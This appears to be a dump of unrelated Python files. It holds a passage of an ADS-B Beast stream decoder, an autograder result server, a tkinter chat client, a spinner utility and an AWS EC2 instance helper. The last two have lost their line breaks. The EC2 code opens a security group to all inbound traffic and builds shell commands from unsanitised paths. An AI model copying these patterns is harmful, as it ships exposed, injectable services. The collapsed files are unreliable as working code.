        """Decode a live Beast-format stream in a background thread,
        optionally mirroring raw messages to `fh`."""
        decoder = cls(reference)

        def next_msg(s: Any) -> Iterator[str]:
            # Split the raw byte stream into Beast frames; only type 0x33
            # (Mode S long, 23 bytes) frames are yielded, others are skipped.
            # Frame lengths: 0x31 -> 11, 0x32 -> 16, 0x33/0x34 -> 23 bytes.
            while True:
                if decoder.thread is None or decoder.thread.to_be_stopped():
                    s.close()
                    return
                data = s.recv(2048)
                while len(data) > 10:
                    if data[1] == 0x33:
                        yield data[:23]
                        data = data[23:]
                        continue
                    if data[1] == 0x32:
                        data = data[16:]
                        continue
                    if data[1] == 0x31:
                        data = data[11:]
                        continue
                    if data[1] == 0x34:
                        data = data[23:]
                        continue
                    # resynchronise on the next 0x1a escape byte
                    it = data.find(0x1a)
                    if it < 1:
                        break
                    data = data[it:]

        def decode():
            for i, bin_msg in enumerate(next_msg(socket)):
                if len(bin_msg) < 23:
                    continue

                msg = "".join(["{:02x}".format(t) for t in bin_msg])

                # Timestamp decoding
                now = datetime.now(timezone.utc)
                if not dump1090:
                    # Radarcape-style timestamp: 18 days-seconds bits + 30
                    # nanosecond bits, relative to midnight UTC.
                    timestamp = int(msg[4:16], 16)

                    nanos = timestamp & 0x00003FFFFFFF
                    secs = timestamp >> 30
                    now = now.replace(hour=0, minute=0, second=0, microsecond=0)
                    now += timedelta(seconds=secs, microseconds=nanos / 1000)

                if fh is not None:
                    fh.write("{},{}\n".format(now.timestamp(), msg))

                # dump1090 has no GPS reference: periodically re-center the
                # CPR reference on the observed traffic
                if dump1090 and i & 127 == 127:
                    decoder.redefine_reference(now)

                decoder.process(now, msg[18:])

        decoder.thread = StoppableThread(target=decode)
        decoder.thread.start()
        return decoder

    def stop(self):
        if self.thread is not None and self.thread.is_alive():
            self.thread.stop()
            self.thread.join()

    def __del__(self):
        self.stop()

    @classmethod
    def from_dump1090(
        cls,
        reference: Union[str, Airport, Tuple[float, float]],
        file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
    ) -> "Decoder":
        """Connect to a local dump1090 (Beast output on port 30005)."""
        now = datetime.now(timezone.utc)
        filename = now.strftime(file_pattern)
        today = os.path.expanduser(filename)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("localhost", 30005))
        fh = open(today, "a", 1)  # line-buffered raw-message log
        return cls.from_socket(s, reference, True, fh)

    @classmethod
    def from_address(
        cls,
        host: str,
        port: int,
        reference: Union[str, Airport, Tuple[float, float]],
        file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_tcp.csv",
    ) -> "Decoder":
        """Connect to a remote Beast-format TCP feed."""
        now = datetime.now(timezone.utc)
        filename = now.strftime(file_pattern)
        today = os.path.expanduser(filename)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        fh = open(today, "a", 1)  # line-buffered raw-message log
        return cls.from_socket(s, reference, False, fh)

    def redefine_reference(self, time: datetime) -> None:
        """Re-center the CPR reference on the mean position of low-flying
        aircraft seen within the last 20 minutes."""
        pos = list(
            (ac.lat, ac.lon)
            for ac in self.acs.values()
            if ac.alt is not None
            and ac.alt < 5000
            and ac.tpos is not None
            and (time - ac.tpos).total_seconds() < 20 * 60
        )
        n = len(pos)
        if n > 0:
            self.acs.set_latlon(
                sum(a[0] for a in pos) / n, sum(a[1] for a in pos) / n
            )

    def process_msgs(self, msgs: Iterable[Tuple[datetime, str]]) -> None:
        # NOTE(review): `sum(1 for _ in msgs)` consumes the iterable once
        # for the progress-bar total — callers must pass a list (from_file
        # does), not a one-shot generator.
        for i, (time, msg) in tqdm(enumerate(msgs), total=sum(1 for _ in msgs)):
            if i & 127 == 127:
                self.redefine_reference(time)
            self.process(time, msg)

    def process(
        self,
        time: datetime,
        msg: str,
        *args,
        spd: Optional[float] = None,
        trk: Optional[float] = None,
        alt: Optional[float] = None,
    ) -> None:
        """Dispatch one 14-byte (28 hex chars) Mode S message to the
        matching Aircraft sink, based on downlink format and typecode."""

        if len(msg) != 28:
            return

        df = pms.df(msg)

        if df == 4 or df == 20:
            # surveillance / Comm-B altitude reply
            icao = pms.icao(msg)
            ac = self.acs[icao.lower()]
            ac.altcode = time, msg

        if df == 5 or df == 21:
            # surveillance / Comm-B identity reply
            icao = pms.icao(msg)
            ac = self.acs[icao.lower()]
            ac.idcode = time, msg

        if df == 17 or df == 18:  # ADS-B

            if int(pms.crc(msg, encode=False), 2) != 0:
                return

            tc = pms.adsb.typecode(msg)
            icao = pms.icao(msg)
            ac = self.acs[icao.lower()]

            if 1 <= tc <= 4:
                ac.callsign = time, msg

            if 5 <= tc <= 8:
                ac.surface = time, msg

            if tc == 19:
                ac.speed = time, msg

            if 9 <= tc <= 18:
                # This is barometric altitude
                ac.position = time, msg

            if 20 <= tc <= 22:
                # Only GNSS altitude
                pass

            # (uncertainty / NIC / NAC / SIL decoding intentionally left out
            # here; see the pyModeS documentation for those fields)

        elif df == 20 or df == 21:
            # Comm-B: infer which BDS register the payload carries
            bds = pms.bds.infer(msg)
            icao = pms.icao(msg)
            ac = self.acs[icao.lower()]

            if bds == "BDS20":
                ac.bds20 = time, msg
                return

            if bds == "BDS40":
                ac.bds40 = time, msg
                return

            if bds == "BDS44":
                ac.bds44 = time, msg
                return

            if bds == "BDS50,BDS60":
                # ambiguous inference: disambiguate using the current state
                # vector (caller-provided values take precedence)
                if spd is not None and trk is not None and alt is not None:
                    bds = pms.bds.is50or60(msg, spd, trk, alt)
                elif (
                    ac.spd is not None
                    and ac.trk is not None
                    and ac.alt is not None
                ):
                    bds = pms.bds.is50or60(msg, ac.spd, ac.trk, ac.alt)
                else:
                    return
                # do not return!

            if bds == "BDS50":
                ac.bds50 = time, msg
                return

            if bds == "BDS60":
                ac.bds60 = time, msg
                return

    @property
    def aircraft(self) -> List[Dict[str, Any]]:
        """Summary rows for all identified aircraft, most data first."""
        return sorted(
            (
                dict(
                    icao24=key,
                    callsign=ac.callsign,
                    length=(
                        (len(ac.cumul) + len(ac._flight))
                        if ac._flight is not None
                        else len(ac.cumul)
                    ),
                    position=ac.lat is not None,
                    data=ac,
                )
                for (key, ac) in self.acs.items()
                if ac.callsign is not None
            ),
            key=itemgetter("length"),
            reverse=True,
        )

    @property
    def traffic(self) -> Optional[Traffic]:
        """All decoded flights as a Traffic object, or None if empty."""
        try:
            return Traffic.from_flights(
                self[elt["icao24"]] for elt in self.aircraft
            )
        except ValueError:
            return None

    @property
    def widget(self) -> "DecoderWidget":
        return DecoderWidget(self)

    def __getitem__(self, icao: str) -> Optional[Flight]:
        return self.acs[icao].flight


class DecoderWidget(TrafficWidget):
    """TrafficWidget bound to a live Decoder: `traffic` re-reads the
    decoder's current state on each access."""

    def __init__(self, decoder: Decoder, *args, **kwargs) -> None:
        self.decoder = decoder
        traffic = decoder.traffic
        if traffic is None:
            raise ValueError("traffic is None")
        super().__init__(traffic, *args, **kwargs)

    @property
    def traffic(self) -> Traffic:
        traffic = self.decoder.traffic
        assert traffic is not None
        self._traffic = traffic
        self.t_view = self._traffic
        self.set_time_range()
        return self._traffic
ag_result_server.py
import BaseHTTPServer
import SocketServer
import cgi
import json
import threading
import logging

logger = logging.getLogger('ag_result_server');

from . import config, jprint
from db.schema import connection as conn, Assignment, Member, Grade
import emailer

from redis import Redis
from rq import Queue

# Shared RQ work queue: the HTTP handler enqueues results here so they are
# processed asynchronously by worker processes.
work_queue = Queue(connection=Redis())


class AutograderResultException(Exception):
    """Raised when an autograder result payload is invalid or refers to an
    unknown assignment/owner."""
    pass


def handle_result(data):
    """ Handles output from an autograder. This function has the ability to
    record a score in the database, email students their results, and log the
    raw output from the autograder.

    Runs inside an RQ worker, not in the HTTP handler.

    Raises:
        AutograderResultException: if a required field is missing, or the
            referenced assignment/owner does not exist.
    """
    try:
        # required
        # NOTE(review): a non-numeric 'score' raises ValueError, which is
        # not caught by the KeyError handler below — confirm intended.
        score = float(data['score'])
        assignment_name = data['assignment']
        repo = data['repo']
        submit = bool(data['submit'])
        # optional
        group_repo = bool(data.get('group_repo'))
        grader_login = data.get('grader_login')
        comments = data.get('comments')
        email_content = data.get('email_content')
        email_plain = bool(data.get('email_plain'))
        raw_output = data.get('raw_output')
    except KeyError:
        raise AutograderResultException(
            'Received invalid data; required fields are missing.\n{0}'.format(
                jprint.pformat(data)));

    assignment = conn.Assignment.find_one({'name': assignment_name})
    # The repo name identifies either a group or an individual student.
    owner = conn.Group.find_one({'name': repo}) if group_repo \
        else conn.Member.find_one({'login': repo})
    if not owner or not assignment:
        raise AutograderResultException(
            'Assignment or owner do not exist; ignoring ag result.\n{0}.'.format(
                jprint.pformat(data)))

    if submit:
        submit_grade(assignment['_id'], owner['_id'], group_repo, score,
                     grader_login=grader_login, comments=comments)

    if email_content:
        # Email the single owner, or every member of the group.
        recipients = []
        if not group_repo:
            recipients.append(owner['email'])
        else:
            recipients.extend([student['email'] for student in
                conn.Member.find({'_id': {'$in': owner['members']}})])
        email_results(recipients, assignment['name'], email_content,
                      email_plain)

    if raw_output:
        logger.info(raw_output)


def submit_grade(assignment_id, owner_id, group_repo, score,
                 grader_login=None, comments=None):
    """ Submits grade into database.

    Upserts the (assignment, owner) grade document; on a fresh insert the
    document is re-saved so the ODM sets up its relations.
    """
    grader = conn.Member.find_one({'login': grader_login}) if grader_login \
        else None
    # grade_coll is the module-level collection handle defined below; it is
    # bound at call time, after module import completes.
    result = grade_coll.update(
        {'assignment': assignment_id, 'owner': owner_id},
        {'$set': {
            'group': group_repo,
            'score': score,
            'grader': (grader['_id'] if grader else None),
            'comments': comments}
        },
        upsert=True
    )
    if 'upserted' in result:
        new_grade = conn.Grade.find_one({'_id': result['upserted']})
        new_grade.save()    # re-save grade to set up relations

# Raw pymongo handle to the course's grade collection.
grade_coll = conn[config['course_name']][Grade.__collection__]


def email_results(recipients, assignment_name, email_content,
                  email_plain=True):
    """ Emails autograder output to recipient students. """
    subject = '[{0} Autograder] {1} Results'.format(config['course_name'],
                                                    assignment_name)
    for recipient in recipients:
        if email_plain:
            emailer.send_plaintext(recipient, subject, email_content)
        else:
            emailer.send_markdown(recipient, subject, email_content)


class AutograderResultHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """HTTP handler accepting JSON autograder results via POST and queueing
    them for asynchronous processing."""

    def __init__(self, request, client_address, server):
        BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request,
            client_address, server)

    def do_POST(self):
        # Only JSON bodies are accepted; anything else gets a 403.
        try:
            ctype, pdict = cgi.parse_header(
                self.headers.getheader('content-type'))
        except Exception:
            self.send_error(403, 'No Content-Type in header.')
            return
        if ctype == 'application/json':
            length = int(self.headers.getheader('content-length'))
            data = json.loads(self.rfile.read(length))
            logger.debug('Recieved autograder result:\n{0}'.format(
                jprint.pformat(data)))
            # Hand off to an RQ worker so the HTTP response is immediate.
            work_queue.enqueue(handle_result, data)
            self.send_response(200)
        else:
            logger.warn('Content type is not JSON; sending 403.')
            self.send_error(403, 'Content type must be JSON.')

    def log_message(self, format, *args):
        # Route BaseHTTPServer's default stderr logging into our logger.
        logger.info(format % args)

    def shutdown(self):
        # NOTE(review): BaseHTTPRequestHandler defines no shutdown(), and
        # super(self.__class__, ...) breaks under further subclassing —
        # confirm this method is ever actually invoked.
        logger.info('Shutting down.')
        super(self.__class__, self).shutdown(self)


def run_ag_result_server(host='', port=int(config['ag_result_server_port'])):
    """Start the result server on a daemon thread and return the server.

    Note: the default port is read from config once, at import time.
    """
    server_address = (host, port)
    server = SocketServer.TCPServer(server_address,
                                    AutograderResultHandler)
    # NOTE(review): set after TCPServer.__init__ has already called
    # listen() with the default backlog — confirm this has any effect.
    server.request_queue_size = 50  # increase maximum simultaneous requests
    t = threading.Thread(target=server.serve_forever)
    t.setDaemon(True)  # don't hang on exit
    t.start()
    logger = logging.getLogger('ag_result_server')
    logger.info('AutograderResultHandler started on {0}'.format(
        server.server_address))
    return server
Client.py
import socket
from threading import Thread
from tkinter import *

# Connect to the chat server at import time; the GUI below shares this
# module-level socket for all traffic.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip_address = '127.0.0.1'
port = 8000
client.connect((ip_address, port))
print("Connected with the server...")


class GUI:
    """Tkinter chat client: a login dialog followed by a chat window.

    Incoming messages are read on a background thread (receive); outgoing
    messages are sent on short-lived threads (write).
    """

    def __init__(self):
        # Main chat window, created hidden until login completes.
        self.Window = Tk()
        self.Window.withdraw()
        # Login dialog asking for the user's display name.
        self.login = Toplevel()
        self.login.title("Login")
        self.login.resizable(width = False, height = False)
        self.login.configure(width = 400, height = 300)
        self.pls = Label(self.login,
                         text = "Please login to continue",
                         justify = CENTER,
                         font = "Helvetica 14 bold")
        self.pls.place(relheight = 0.15, relx = 0.2, rely = 0.07)
        self.labelName = Label(self.login,
                               text = "Name: ",
                               font = "Helvetica 12")
        self.labelName.place(relheight = 0.2, relx = 0.1, rely = 0.2)
        self.entryName = Entry(self.login, font = "Helvetica 14")
        self.entryName.place(relwidth = 0.4, relheight = 0.12,
                             relx = 0.35, rely = 0.2)
        self.entryName.focus()
        self.go = Button(self.login,
                         text = "CONTINUE",
                         font = "Helvetica 14 bold",
                         command = lambda: self.goAhead(self.entryName.get()))
        self.go.place(relx = 0.4, rely = 0.55)
        # Blocks here until the window is closed.
        self.Window.mainloop()

    def goAhead(self, name):
        # Close the login dialog, build the chat layout, and start the
        # background receiver thread.
        self.login.destroy()
        self.layout(name)
        rcv = Thread(target=self.receive)
        rcv.start()

    def layout(self, name):
        """Build the chat window widgets and reveal the main window."""
        self.name = name
        self.Window.deiconify()
        self.Window.title("CHATROOM")
        self.Window.resizable(width = False, height = False)
        self.Window.configure(width = 470, height = 550, bg = "#17202A")
        # Header bar showing the user's name.
        self.labelHead = Label(self.Window,
                               bg = "#17202A", fg = "#EAECEE",
                               text = self.name,
                               font = "Helvetica 13 bold",
                               pady = 5)
        self.labelHead.place(relwidth = 1)
        self.line = Label(self.Window, width = 450, bg = "#ABB2B9")
        self.line.place(relwidth = 1, rely = 0.07, relheight = 0.012)
        # Read-only conversation transcript.
        self.textCons = Text(self.Window, width = 20, height = 2,
                             bg = "#17202A", fg = "#EAECEE",
                             font = "Helvetica 14",
                             padx = 5, pady = 5)
        self.textCons.place(relheight = 0.745, relwidth = 1, rely = 0.08)
        self.labelBottom = Label(self.Window, bg = "#ABB2B9", height = 80)
        self.labelBottom.place(relwidth = 1, rely = 0.825)
        # Message entry field and send button.
        self.entryMsg = Entry(self.labelBottom,
                              bg = "#2C3E50", fg = "#EAECEE",
                              font = "Helvetica 13")
        self.entryMsg.place(relwidth = 0.74, relheight = 0.06,
                            rely = 0.008, relx = 0.011)
        self.entryMsg.focus()
        self.buttonMsg = Button(self.labelBottom,
                                text = "Send",
                                font = "Helvetica 10 bold",
                                width = 20,
                                bg = "#ABB2B9",
                                command = lambda: self.sendButton(self.entryMsg.get()))
        self.buttonMsg.place(relx = 0.77, rely = 0.008,
                             relheight = 0.06, relwidth = 0.22)
        self.textCons.config(cursor = "arrow")
        scrollbar = Scrollbar(self.textCons)
        scrollbar.place(relheight = 1, relx = 0.974)
        scrollbar.config(command = self.textCons.yview)
        # Keep the transcript read-only; show_message toggles it briefly.
        self.textCons.config(state = DISABLED)

    def sendButton(self, msg):
        # Stash the message and send it from a short-lived thread so the
        # UI never blocks on the socket.
        self.textCons.config(state = DISABLED)
        self.msg = msg
        self.entryMsg.delete(0, END)
        snd = Thread(target = self.write)
        snd.start()

    def show_message(self, message):
        # Temporarily enable the transcript to append, then lock it again
        # and scroll to the end.
        self.textCons.config(state = NORMAL)
        self.textCons.insert(END, message+"\n\n")
        self.textCons.config(state = DISABLED)
        self.textCons.see(END)

    def receive(self):
        """Background loop: display every message from the server.

        The server's 'NICKNAME' probe is answered with our name instead of
        being displayed.
        """
        while True:
            try:
                message = client.recv(2048).decode('utf-8')
                if message == 'NICKNAME':
                    client.send(self.name.encode('utf-8'))
                else:
                    self.show_message(message)
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt
                # and hides the actual error — consider narrowing.
                print("An error occured!")
                client.close()
                break

    def write(self):
        # Send self.msg (set by sendButton) once and echo it locally; the
        # while/break shape makes this a single-shot loop.
        self.textCons.config(state=DISABLED)
        while True:
            message = (f"{self.name}: {self.msg}")
            client.send(message.encode('utf-8'))
            self.show_message(message)
            break


# Launch the client (blocks in mainloop).
g = GUI()
spinner.py
import sys import threading import itertools import time class Spinner: def __init__(self, message, delay=0.1): self.spinner = itertools.cycle(['-', '/', '|', '\\']) self.delay = delay self.busy = False self.spinner_visible = False sys.stdout.write(message) def write_next(self): with self._screen_lock: if not self.spinner_visible: sys.stdout.write(next(self.spinner)) self.spinner_visible = True sys.stdout.flush() def remove_spinner(self, cleanup=False): with self._screen_lock: if self.spinner_visible: sys.stdout.write('\b') self.spinner_visible = False if cleanup: sys.stdout.write(' ') # overwrite spinner with blank sys.stdout.write('\r') # move to next line sys.stdout.flush() def spinner_task(self): while self.busy: self.write_next() time.sleep(self.delay) self.remove_spinner() def __enter__(self): if sys.stdout.isatty(): self._screen_lock = threading.Lock() self.busy = True self.thread = threading.Thread(target=self.spinner_task) self.thread.start() def __exit__(self, exception, value, tb): if sys.stdout.isatty(): self.busy = False self.remove_spinner(cleanup=True) else: sys.stdout.write('\r')
instance.py
import atexit import boto3 import time import logging import os import socket import io import sys import threading from botocore.exceptions import ClientError import paramiko from .resources import resources # The ARN of an IAM policy that allows full access to S3. S3_FULL_ACCESS_ARN = "arn:aws:iam::aws:policy/AmazonS3FullAccess" # The URL to GET from within an instance in order to check the instance's # "instance-action" metadata attribute. INSTANCE_ACTION_URL = "http://169.254.169.254/latest/meta-data/spot/" \ "instance-action" # The interval, in seconds, to wait between checks of an instance's # "instance-action" metadata attribute. Per https://docs.aws.amazon.com/ # AWSEC2/latest/UserGuide/spot-interruptions.html. TERMINATION_MONITORING_INTERVAL = 5 # The SSH keepalive interval to use for SSH connections to instances, in # seconds. SSH_KEEPALIVE = 15 ec2 = boto3.resource('ec2') class Instance(object): """An EC2 instance.""" # The interval at which to poll for an AMI becoming available, in seconds. IMAGE_POLL_INTERVAL = 3 # The maximum number of times to poll for an AMI becoming available. IMAGE_POLL_MAX = (5 * 60) // IMAGE_POLL_INTERVAL # The interval (in seconds) at which to poll for an instance entering the # "running" state. _RUNNING_POLL_INTERVAL = 3 # The maximum amount of time (in seconds) to wait for an instance to enter # the "running" state. _RUNNING_POLL_TIMEOUT = 3 * 60 # The name of the key pair used by Instances. KEY_PAIR_NAME = "cirrus_key_pair" # The path at which to save the private key to Instances. May begin with a # tilde. PRIVATE_KEY_PATH = "~/.ssh/cirrus_key_pair.pem" # The name of the security group used by Instances. SECURITY_GROUP_NAME = "cirrus_security_group" # The name of the role used by Instances. ROLE_NAME = "cirrus_instance_role" # The name of the instance profile used by Instances. 
INSTANCE_PROFILE_NAME = "cirrus_instance_profile" # The number of authentication failures that are allowed to occur while # connecting to an instance. _AUTHENTICATION_FAILURES = 5 @staticmethod def images_exist(name): """Return whether any AMI with a given name, owned by the current user, exists. Args: name (str): The name. Returns: bool: Whether any exists. """ log = logging.getLogger("cirrus.instance.Instance") log.debug("Describing images.") response = resources.ec2_client.describe_images( Filters=[{"Name": "name", "Values": [name]}], Owners=["self"]) result = len(response["Images"]) > 0 log.debug("Done.") return result @staticmethod def delete_images(name): """Delete any AMI with a given name, owned by the current user. Args: name (str): The name. """ log = logging.getLogger("cirrus.instance.Instance") log.debug("Describing images.") response = resources.ec2_client.describe_images( Filters=[{"Name": "name", "Values": [name]}], Owners=["self"]) for info in response["Images"]: image_id = info["ImageId"] log.debug("Deleting image %s." % image_id) resources.ec2_resource.Image(info["ImageId"]).deregister() log.debug("Done.") @classmethod def set_up_key_pair(cls): """Create a key pair for use by `Instance`s. Deletes any existing key pair with the same name. Saves the private key to `~/cirrus_key_pair.pem`. """ from . 
import automate log = logging.getLogger("cirrus.instance.Instance.set_up_key_pair") log.debug("Checking for an existing key pair.") filter = {"Name": "key-name", "Values": [cls.KEY_PAIR_NAME]} response = resources.ec2_client.describe_key_pairs(Filters=[filter]) if len(response["KeyPairs"]) > 0: log.debug("Deleting an existing key pair.") resources.ec2_client.delete_key_pair(KeyName=cls.KEY_PAIR_NAME) log.debug("Creating key pair.") response = resources.ec2_client.create_key_pair( KeyName=cls.KEY_PAIR_NAME) log.debug("Saving private key.") path = os.path.expanduser(cls.PRIVATE_KEY_PATH) if not os.path.exists(os.path.dirname(path)): os.path.makedirs(os.path.dirname(path)) with open(path, "w") as f: f.write(response["KeyMaterial"]) log.debug("Done.") @classmethod def set_up_security_group(cls): """Create a security group for use by `Instance`s. Deletes any existing security groups with the same name. """ from . import automate log = logging.getLogger( "cirrus.instance.Instance.set_up_security_group") log.debug("Checking for existing security groups.") filter = {"Name": "group-name", "Values": [cls.SECURITY_GROUP_NAME]} response = resources.ec2_client.describe_security_groups( Filters=[filter]) for group_info in response["SecurityGroups"]: log.debug("Deleting an existing security group.") resources.ec2_client.delete_security_group( GroupId=group_info["GroupId"]) log.debug("Creating security group.") resources.ec2_client.create_security_group( GroupName=cls.SECURITY_GROUP_NAME, Description="Generated by the Cirrus setup script. Lets all " "inbound and outbound traffic through." ) # Allow all outbound traffic so that Instances will be able to fetch # software and data. Allow all inbound traffic so that we will be able # to send messages to programs on Instances. log.debug("Configuring security group.") # An IpProtocol of -1 means "all protocols" and additionally implies # "all ports". 
resources.ec2_client.authorize_security_group_ingress( GroupName=cls.SECURITY_GROUP_NAME, IpProtocol="-1", CidrIp="0.0.0.0/0") log.debug("Done.") @classmethod def set_up_role(cls): """Create a role for use by `Instance`s. Deletes any existing role with the same name. """ from . import automate log = logging.getLogger("cirrus.instance.Instance.set_up_role") log.debug("Checking for an existing role.") iam_client = resources.iam_client # TODO: Could cause a problem under rare circumstances. We are assuming # that there are less than 1000 roles in the account. roles_response = iam_client.list_roles() exists = False for role_info in roles_response["Roles"]: if role_info["RoleName"] == cls.ROLE_NAME: exists = True break if exists: log.debug("Listing the policies of existing role.") role_policy_response = iam_client.list_attached_role_policies( RoleName=cls.ROLE_NAME) for policy_info in role_policy_response["AttachedPolicies"]: log.debug("Detaching policy from existing role.") iam_client.detach_role_policy( RoleName=cls.ROLE_NAME, PolicyArn=policy_info["PolicyArn"] ) log.debug("Listing the instance profiles of existing role.") role = resources.iam_resource.Role(cls.ROLE_NAME) for instance_profile in role.instance_profiles.all(): log.debug("Detaching instance profile from existing role.") instance_profile.remove_role(RoleName=cls.ROLE_NAME) log.debug("Deleting an existing role.") iam_client.delete_role(RoleName=cls.ROLE_NAME) log.debug("Creating role.") role = iam_client.create_role( RoleName=cls.ROLE_NAME, AssumeRolePolicyDocument="""{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Service": "ec2.amazonaws.com" }, "Action": "sts:AssumeRole" } ] }""" ) log.debug("Attaching policies to role.") iam_client.attach_role_policy(RoleName=cls.ROLE_NAME, PolicyArn=S3_FULL_ACCESS_ARN) log.debug("Done.") @classmethod def set_up_instance_profile(cls): """Create an instance profile for use by `Instance`s. 
Deletes any existing instance profile with the same name. The instance role must have already been created. """ from . import automate log = logging.getLogger( "cirrus.instance.Instance.set_up_instance_profile") log.debug("Checking for an existing instance profile.") existing = None for instance_profile in resources.iam_resource.instance_profiles.all(): if instance_profile.name == cls.INSTANCE_PROFILE_NAME: existing = instance_profile break if existing is not None: log.debug("Listing the roles of existing instance profile.") for role in existing.roles: log.debug("Removing role from existing instance profile.") existing.remove_role(RoleName=role.name) log.debug("Deleting existing instance profile.") existing.delete() log.debug("Creating instance profile.") instance_profile = resources.iam_resource.create_instance_profile( InstanceProfileName=cls.INSTANCE_PROFILE_NAME) log.debug("Adding role to instance profile.") instance_profile.add_role(RoleName=cls.ROLE_NAME) log.debug("Waiting for changes to take effect.") # IAM is eventually consistent, so we need to wait for our changes to be # reflected. The delay distribution is heavy-tailed, so this might # still error, rarely. The right way is to retry at an interval. time.sleep(automate.IAM_CONSISTENCY_DELAY) log.debug("Done.") def __init__(self, name, disk_size, typ, username, ami_id=None, ami_owner_name=None, spot_bid=None, port=None): """Define an EC2 instance. Args: name (str): Name for the instance. The same name will be used for the key pair and security group that get created. disk_size (int): Disk space for the instance, in GB. typ (str): Type for the instance. username (str): SSH username for the AMI. ami_id (str): ID of the AMI for the instance. If omitted or None, `ami_name` must be provided. ami_owner_name (tuple[str, str]): The owner and name of the AMI for the instance. Only used if `ami_id` is not provided. The first AMI found with the name `ami_owner_name[1]` owned by `ami_owner_name[0]` is used. 
Valid choices for `ami_owner_name[0]` are `"self"` to indicate the current account, `"amazon"` to indicate AWS itself, or any account ID. spot_bid (str): The spot instance bid to make, as a dollar amount + per hour. If omitted or None, the instance will not be spot. """ self._name = name self._disk_size = disk_size self._ami_id = ami_id self._type = typ self._username = username self._spot_bid = spot_bid self._log = logging.getLogger("cirrus.instance.Instance") self.port = port self.elastic_ip = None if self._ami_id is None: assert ami_owner_name is not None, \ "When ami_id is not specified, ami_owner_name must be." self._log.debug("Resolving AMI owner/name to AMI ID.") owner, name = ami_owner_name filter = { "Name": "name", "Values": [name] } response = resources.ec2_client.describe_images( Filters=[filter], Owners=[owner] ) if len(response["Images"]) > 0: self._ami_id = response["Images"][0]["ImageId"] else: raise RuntimeError("No AMIs with the given owner/name were " "found.") else: assert ami_owner_name is None, \ "When ami_id is specified, ami_owner_name should not be." self.instance = None self._ssh_client = None self._sftp_client = None self._buffering_commands = False self._buffered_commands = [] self._should_stop_monitoring = None self._log.debug("Done.") def start(self): """Start the instance. If an instance with the same name is already running, it will be reused and no new instance will be started. When finished, call `cleanup`. `cleanup` will also be registered as an `atexit` cleanup function so that it will still be called despite any errors. """ atexit.register(self.cleanup) if not self._exists(): self._start_and_wait() if self._spot_bid is not None: self._start_termination_monitoring() else: # If the instance already exists, assume it's a spot instance, just # to be safe. self._start_termination_monitoring() self._log.debug("Done.") def __str__(self): """Return a string representation of this instance. Returns: str: The representation. 
""" return "Inst[%s]" % self._name def public_ip(self): """Get the public IP address of this instance. Returns: str: The IP address. """ if self.elastic_ip: return self.elastic_ip.public_ip return self.instance.public_ip_address def private_ip(self): """Get the private IP address of this instance. Returns: str: The IP address. """ return self.instance.private_ip_address def run_command(self, command, check=True): """Run a command on this instance. Args: command (str): The command to run. check (bool): Whether to raise an error if the exit code of the command is nonzero. Returns: tuple[int, bytes, bytes]: The exit code, stdout, and stderr, respectively, of the process. """ if self._buffering_commands: print("BUFFERING COMMANDS") self._buffered_commands.append(command) return 0, "", "" if self._ssh_client is None: self._log.debug("Calling _connect_ssh.") self._connect_ssh() # self.instance.load() self._log.debug("Running `%s`." % command) _, stdout, stderr = self._ssh_client.exec_command(command) # exec_command is asynchronous. The following waits for completion. self._log.debug("Waiting for completion.") self._log.debug("Fetching stdout and stderr.") stdout_data, stderr_data = stdout.read(), stderr.read() self._log.debug("stdout had length %d." % len(stdout_data)) self._log.debug("stderr had length %d." % len(stderr_data)) status = stdout.channel.recv_exit_status() self._log.debug("Exit code was %d." % status) self._log.debug("stdout: ") self._log.debug(stdout_data) self._log.debug("stderr: ") self._log.debug(stderr_data) if check and status != 0: raise RuntimeError("`%s` returned nonzero exit code %d. The stderr " "follows.\n%s" % (command, status, stderr_data)) self._log.debug("Done.") return status, stdout_data, stderr_data def buffer_commands(self, flag): """Enable or disable command buffering for this instance. When command buffering is enabled, calls to `run_command` do not immediately run commands on the instance. Instead, commands are collected in a queue. 
The queue of commands is run all at once when `buffer_commands` is used to disable command buffering. This is useful for batching commands, which increases efficiency. Args: flag (bool): If True, command buffering will be enabled. If False, command buffering will be disabled. """ if flag == False and self._buffering_commands == True: concat_command = "\n".join(self._buffered_commands) self._buffered_commands = [] self._buffering_commands = False return self.run_command(concat_command) else: if flag == True and self._buffering_commands == False: self._buffering_commands = True return 0, "", "" def download_s3(self, src, dest): """Download a file from S3 to this instance. Does not require that the AWS CLI be installed. Args: src (str): A path to a file on S3. dest (str): The path at which to save the file on this instance. If relative, then relative to the home folder of this instance's SSH user. """ from . import automate assert src.startswith("s3://") assert not dest.startswith("s3://") bucket, key = automate._split_s3_url(src) # print("BUCKET") # print(bucket) # print("KEY") # print(key) # print("DEST") # print(dest) # s3_client = boto3.client('s3') # obj = s3_client.get_object(Bucket=bucket, Key=key) # s3 = boto3.client('s3') # s3.download_file(bucket, key, dest) # print("OBJECT: ") # print(obj) self.run_command("wget http://%s.s3.amazonaws.com/%s -O %s" % (bucket, key, dest)) def upload_s3(self, src, dest, public): """Upload a file from this instance to S3. Requires that the AWS CLI be installed. Args: src (str): A path to a file on this instance. If relative, then relative to the home folder of this instance's SSH user. dest (str): A path on S3 to upload to. public (bool): Whether to give the resulting S3 object the "public-read" ACL. 
